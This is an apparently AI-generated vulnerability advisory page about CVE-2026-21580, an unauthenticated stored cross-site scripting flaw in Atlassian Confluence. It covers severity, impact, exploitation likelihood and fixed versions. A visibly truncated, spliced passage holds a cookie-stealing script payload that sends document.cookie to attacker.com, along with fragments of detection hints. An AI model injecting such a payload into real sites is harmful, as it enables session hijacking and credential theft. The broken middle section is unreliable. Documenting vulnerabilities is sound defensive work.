
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21580 is a Critical-severity Stored XSS, Privilege Escalation, and Security Misconfiguration vulnerability affecting Atlassian Confluence Data Center and Server. The vulnerability was introduced across multiple version branches starting from 7.1.1 and affects Confluence Data Center versions up through 10.2.11, as well as Confluence Server versions 7.19.27–7.19.30 and 8.5.15–8.5.31. It was disclosed on August 18, 2026, via Atlassian's monthly Security Bulletin and was reported through Atlassian's Bug Bounty program. The vulnerability carries a CVSS v4.0 base score of 9.3 (Critical) per GitHub Advisory, while Atlassian's own advisory cites a CVSS score of 8.6 (Atlassian Advisory, GitHub Advisory).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a Stored XSS variant combined with privilege escalation and security misconfiguration weaknesses. An unauthenticated attacker can inject malicious HTML or JavaScript into Confluence pages or content that is persistently stored and later rendered in victims' browsers. The attack requires no authentication, no special privileges, and no user interaction from the attacker's side, making it fully remotely exploitable over the network with low complexity. The security misconfiguration component suggests that overlooked security best practices in the application's configuration further enable unauthorized system access beyond the XSS payload itself (GitHub Advisory, Atlassian Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary HTML or JavaScript code in the browsers of authenticated Confluence users, including administrators, enabling session hijacking, credential theft, and actions performed on behalf of higher-privileged users. The privilege escalation component means an attacker can effectively gain administrative-level access to the Confluence instance, potentially exposing sensitive organizational data, internal documentation, and configuration details stored within Confluence. The security misconfiguration aspect may additionally allow direct unauthorized system access, compounding the risk of data exfiltration and lateral movement within the organization (GitHub Advisory, Atlassian Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (GitHub Advisory). The NVD SSVC assessment classifies the vulnerability as automatable with total technical impact, indicating that automated exploitation at scale is theoretically feasible. The EPSS score is approximately 0.355–0.395%, placing it in the 33rd percentile for exploitation likelihood within 30 days. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and no threat actor attribution has been reported. Qualys has published a detection (ID: 520233) for this vulnerability (Atlassian Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a more sophisticated payload to perform actions via the Confluence REST API) into a vulnerable content field without authentication, exploiting the security misconfiguration that permits unauthenticated content submission./rest/api/user, /rest/api/space) originating from authenticated admin sessions at unusual times.<script> tags, javascript: URIs, or encoded payloads (e.g., base64-encoded scripts).Atlassian recommends upgrading to the latest version of Confluence Data Center and Server. For customers unable to upgrade to the latest release, the minimum fixed versions are: Confluence Data Center and Server 9.2 branch: upgrade to 9.2.21 or later; Confluence Data Center and Server 10.2 branch: upgrade to 10.2.13 or later. The Atlassian Security Bulletin also identifies 10.2.15 (LTS) and 9.2.23 (LTS) as recommended Data Center-only fixed versions as of August 18, 2026. No configuration-based workaround has been published; patching is the only recommended remediation. Updated software can be obtained from the Atlassian download center (Atlassian Advisory, GitHub Advisory).
The vulnerability received coverage from security news outlets including SecurityOnline.info and threat intelligence platforms such as CyCognito, which published a blog post highlighting the privilege escalation risk via unauthenticated stored XSS. Social media discussion was observed on Mastodon (infosec.exchange and mastodon.social) shortly after disclosure. Qualys included detection for this CVE in its August 2026 application security detections publication. Overall community sentiment reflects moderate concern given the unauthenticated attack vector, though the absence of public PoC code and active exploitation has tempered urgency (Atlassian Advisory, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."